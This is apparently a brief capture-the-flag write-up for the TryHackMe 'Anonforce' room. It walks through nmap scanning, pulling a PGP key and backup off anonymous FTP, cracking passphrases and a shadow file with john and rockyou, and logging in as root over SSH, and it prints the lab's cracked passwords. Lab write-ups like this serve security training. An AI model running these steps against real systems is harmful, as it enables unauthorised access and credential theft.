Anonforce
Room Link: https://tryhackme.com/room/bsidesgtanonforce
Initial Scan
Kali
nmap -A $VICTIM


Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP
Anonymous login is enabled. There was a folder called notread with a pgp file.
Kali
ftp $VICTIM
> cd notread
> mget *

I used john to crack the private.asc file
Kali
/opt/john/gpg2john private.asc > pgp.hash
john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt

Kali
gpg --import private.asc
Password: xbox360

I was able to decrypt backup.pgp which had the shadow file
Kali
gpg --decrypt backup.pgp
Password: xbox360

I copied the above shadow file and tried cracking this file which gave me roots password.
Kali
john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt

Kali
ssh root@$VICTIM
Password: hikari
Last updated